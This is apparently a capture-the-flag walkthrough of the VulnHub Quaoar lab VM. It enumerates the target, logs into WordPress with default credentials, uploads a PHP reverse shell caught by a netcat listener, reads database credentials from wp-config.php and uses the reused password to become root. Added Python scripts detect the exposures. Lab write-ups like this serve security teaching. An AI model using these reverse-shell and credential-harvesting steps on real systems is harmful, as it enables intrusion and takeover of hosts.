VulnHub hackfest2016: Quaoar Solution


For background information on this series of CTFs you may want to read this page. Or, if you're just after my solution, please keep reading.

Quaoar

Intro

This is the first of 3 incrementally difficult CTFs created for HackFest 2016 [email protected] and released on the VulnHub platform.

Link https://www.vulnhub.com/entry/hackfest2016-quaoar,180/

Difficulty –Very Easy

My Solution

As always, start with an Nmap scan to see what ports are open.

[email protected]:~/VulnHub/quaoar# nmap -p- -Pn -v -T4 -A 192.168.5.11
. . . SNIP . . . 
Scanning 192.168.5.11 [65535 ports]
Discovered open port 22/tcp on 192.168.5.11
Discovered open port 80/tcp on 192.168.5.11
Discovered open port 993/tcp on 192.168.5.11
Discovered open port 110/tcp on 192.168.5.11
Discovered open port 995/tcp on 192.168.5.11
Discovered open port 139/tcp on 192.168.5.11
Discovered open port 143/tcp on 192.168.5.11
Discovered open port 53/tcp on 192.168.5.11
Discovered open port 445/tcp on 192.168.5.11

. . . SNIP . . .
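As an added example (not part of the original write-up), here is a small Python script that parses the "Discovered open port" lines Nmap prints in verbose mode and compares them with a baseline of the services a host is supposed to expose. The baseline, and the assumption that only SSH and HTTP are intended on this host, are constructed for the illustration; everything else about the script is generic.

```python
"""Compare Nmap's "Discovered open port" lines against a service baseline.

Added example, not part of the original write-up. BASELINE is an
assumption constructed for the demonstration.
"""
import re
from collections import defaultdict

# Constructed sample: the lines Nmap printed in the scan above.
NMAP_OUTPUT = """\
Scanning 192.168.5.11 [65535 ports]
Discovered open port 22/tcp on 192.168.5.11
Discovered open port 80/tcp on 192.168.5.11
Discovered open port 993/tcp on 192.168.5.11
Discovered open port 110/tcp on 192.168.5.11
Discovered open port 995/tcp on 192.168.5.11
Discovered open port 139/tcp on 192.168.5.11
Discovered open port 143/tcp on 192.168.5.11
Discovered open port 53/tcp on 192.168.5.11
Discovered open port 445/tcp on 192.168.5.11
"""

# Assumed baseline: the services each host is *meant* to expose.
BASELINE = {"192.168.5.11": {(22, "tcp"), (80, "tcp")}}

DISCOVERED_RE = re.compile(
    r"^Discovered open port (?P<port>\d+)/(?P<proto>tcp|udp) on (?P<host>[\d.]+)$"
)

def parse_open_ports(text):
    """Return {host: {(port, proto), ...}} from Nmap's verbose output."""
    found = defaultdict(set)
    for line in text.splitlines():
        m = DISCOVERED_RE.match(line.strip())
        if m:
            found[m.group("host")].add((int(m.group("port")), m.group("proto")))
    return dict(found)

def unexpected_exposure(found, baseline):
    """Ports open on each host that its baseline does not allow, sorted."""
    report = {}
    for host, ports in found.items():
        extra = ports - baseline.get(host, set())
        if extra:
            report[host] = sorted(extra)
    return report

if __name__ == "__main__":
    discovered = parse_open_ports(NMAP_OUTPUT)
    for host, extra in unexpected_exposure(discovered, BASELINE).items():
        print(f"{host}: {len(extra)} port(s) outside baseline: "
              + ", ".join(f"{p}/{proto}" for p, proto in extra))
```

Run against the scan above it reports the mail, DNS and SMB ports as outside the baseline, which is exactly the list a defender would want to justify or close before an attacker gets to pick from it.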

Plenty there, but let's start with the web service on port 80.

Loading the page in a browser gives us a splash screen and a couple of images, not much else.

So throw Nikto at it to see what we can find.

The most interesting point it returned was:

Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

Loading the page shows us a basic WordPress install.

Kali comes with a tool to scan WordPress sites, wpscan. It can enumerate users and plugins and shows you the known vulnerabilities associated with the version numbers it discovers.

[email protected]:~# wpscan -u http://192.168.5.11/wordpress -e u
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.5.11/wordpress/
[+] Started: Tue Mar 21 19:26:36 2017

[!] The WordPress 'http://192.168.5.11/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.5.11/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.5.11/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.5.11/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 8 vulnerabilities identified from the version number

Most of the vulnerabilities are XSS or CSRF, but there is an SQL injection listed.

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16

And a list of usernames:

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used

I started looking for more details on the SQLi but couldn't find a lot of detailed information. It looks like it needs to be coupled with a plugin that mishandles post type names.

While I was researching I figured I may as well throw some creds at the login form. Hydra is capable of doing this, but I like to use ZAP for its ease of use and feedback.

Username admin, password admin makes this one easy.

If you have admin access to a WordPress install the easiest thing to do is just to upload a PHP reverse shell. I like to use the one from pentestmonkey that's included in Kali.

Start by copying the file, then edit it in your favourite editor to change the callback IP and port. Then start a netcat listener.

[email protected]:~/VulnHub/quaoar# cp /usr/share/webshells/php/php-reverse-shell.php shell.php
[email protected]:~/VulnHub/quaoar# nano shell.php 
[email protected]:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...



Back on WordPress select the plugin page from the left hand menu, click ‘Add New’ and look for the link to upload a plugin in zip format.

After clicking this link select and upload your php page.

Ignore any errors generated on the next page and click on Media in the left-hand menu. You should see your PHP file listed. Click the file to show its details and get the link from the Description or URL field. In my case it's ‘/wordpress/wp-content/uploads/2017/04/shell.php’.

Double check your netcat listener is still active and visit this page in a browser. With any luck you should see a connection in netcat.

[email protected]:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.11: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.11] 48435
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 athlon i386 GNU/Linux
 16:20:17 up  5:40,  0 users,  load average: 0.29, 0.13, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 
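The whole chain above hinges on a PHP file being served, and executed, from wp-content/uploads, a tree that should only ever hold images and documents. As an added example (not part of the original write-up), here is a Python script a defender can run over an uploads directory to flag files that are really PHP, either by extension or by a PHP open tag in the content (catching a script renamed to .txt). The sample tree created by build_sample_uploads() and its file contents are constructed for the demonstration.

```python
"""Scan a WordPress uploads tree for files that are really PHP code.

Added example, not part of the original write-up. The sample tree and its
contents are constructed for the demonstration.
"""
import os
import re
import tempfile

# Extensions a typical mod_php / AddHandler setup may execute as PHP.
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar"}
# PHP open tags: "<?php" or the short echo tag "<?=".
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)")

def looks_like_php(path):
    """True if the extension or the first 4 KiB of content indicates PHP."""
    _, ext = os.path.splitext(path)
    if ext.lower() in PHP_EXTENSIONS:
        return True
    try:
        with open(path, "rb") as fh:
            return PHP_TAG_RE.search(fh.read(4096)) is not None
    except OSError:
        return False

def find_php_in_uploads(uploads_root):
    """Return paths relative to uploads_root that look like PHP, sorted."""
    hits = []
    for dirpath, _dirs, files in os.walk(uploads_root):
        for name in files:
            full = os.path.join(dirpath, name)
            if looks_like_php(full):
                hits.append(os.path.relpath(full, uploads_root).replace(os.sep, "/"))
    return sorted(hits)

def build_sample_uploads():
    """Create a constructed uploads tree: two benign files, two suspicious ones."""
    root = tempfile.mkdtemp(prefix="uploads-")
    samples = {
        "2017/04/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "2017/04/shell.php": b"<?php /* constructed stand-in for an uploaded script */ ?>",
        "2017/05/banner.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "2017/05/notes.txt": b"<?= 'constructed: PHP tag hiding in a .txt' ?>",
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    sample_root = build_sample_uploads()
    for hit in find_php_in_uploads(sample_root):
        print(f"PHP content under uploads: {hit}")
```

Detection is the second line; the first is to make the finding irrelevant by telling the web server never to execute anything under uploads (with mod_php, a `<Directory>` block for wp-content/uploads carrying `php_admin_flag engine off`), so an uploaded script is served as inert text rather than run as www-data.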

One of the first things I do when I get a limited shell is spawn a Python TTY shell and get a file listing of the box. In this instance I write it out to the web directory so I can transfer files back to my machine through the browser.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Quaoar:/$ find / > /var/www/dirs.txt

We are looking for flags so a quick grep in the dirs.txt gives us one.

www-data@Quaoar:/$ cat /home/wpadmin/flag.txt
cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e
www-data@Quaoar:/$ 

Now let's see what we have that can get us escalated privileges. WordPress is connected to MySQL and we can read the credentials from the wp-config.php file.

If you didn’t know where it was you could search for it in the dirs.txt but either way:

www-data@Quaoar:/$ cat /var/www/wordpress/wp-config.php
cat /var/www/wordpress/wp-config.php

. . . SNIP . . . 
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
. . . SNIP . . .

Password reuse is fairly common and this box is no exception: the MySQL root password is also the host root password.

www-data@Quaoar:/$ su
su
Password: rootpassword!

root@Quaoar:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Quaoar:/#
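Two configuration choices handed over the box here: WordPress was using the MySQL superuser rather than a dedicated account, and that account's password was the same as the host root password. As an added example (not part of the original write-up), the following Python script audits a wp-config.php for exactly those conditions, plus the file's permission bits. The set of "other secrets" it compares against (for instance passwords gathered from other service configs on the same host) is an assumption of this script, and WP_CONFIG is a constructed copy of the snippet shown above.

```python
"""Audit a wp-config.php for an over-privileged DB account, a reused DB
password, and an over-permissive file mode.

Added example, not part of the original write-up. The 'other_secrets'
comparison set is an assumption; WP_CONFIG is a constructed sample.
"""
import re
import stat

# Matches define('KEY', 'value') with either quote style.
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<key>[A-Z_]+)['"]\s*,\s*['"](?P<val>[^'"]*)['"]\s*\)"""
)

# Constructed sample mirroring the snippet in the write-up.
WP_CONFIG = """\
<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
"""

def parse_defines(text):
    """Return {KEY: value} for every define('KEY', 'value') in the file."""
    return {m.group("key"): m.group("val") for m in DEFINE_RE.finditer(text)}

def audit_wp_config(text, other_secrets=(), mode=None):
    """Return (severity, message) pairs. `mode` is the file's permission bits
    (e.g. os.stat(path).st_mode); pass None to skip the permission check."""
    cfg = parse_defines(text)
    issues = []
    if cfg.get("DB_USER") == "root":
        issues.append(("high", "DB_USER is 'root': create a MySQL account limited to the "
                               "wordpress database instead of sharing the server's superuser"))
    password = cfg.get("DB_PASSWORD", "")
    if not password:
        issues.append(("high", "DB_PASSWORD is empty"))
    elif password in set(other_secrets):
        issues.append(("high", "DB_PASSWORD is reused by another account or service on this host"))
    if mode is not None and mode & (stat.S_IRGRP | stat.S_IROTH):
        issues.append(("medium", "wp-config.php is readable by group or others; "
                                 "restrict it to the web server user"))
    return issues

if __name__ == "__main__":
    # Constructed: secrets already known from elsewhere on the host.
    known_elsewhere = {"rootpassword!"}
    for severity, message in audit_wp_config(WP_CONFIG, known_elsewhere, mode=0o644):
        print(f"[{severity}] {message}")
```

The reuse check is deliberately a set membership test rather than anything clever: the point is that a database password should be unique to the application, so a match against any other credential on the host is itself the finding.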

Now that we have root, the second flag is in /root/flag.txt.

root@Quaoar:/# find / -name flag.txt
find / -name flag.txt
/root/flag.txt
/home/wpadmin/flag.txt
root@Quaoar:/# cat /root/flag.txt
cat /root/flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:/# 

Well, that's it for this one. The difficulty rating was spot on: very easy. On to the next one.

As usual, questions, queries and comments below.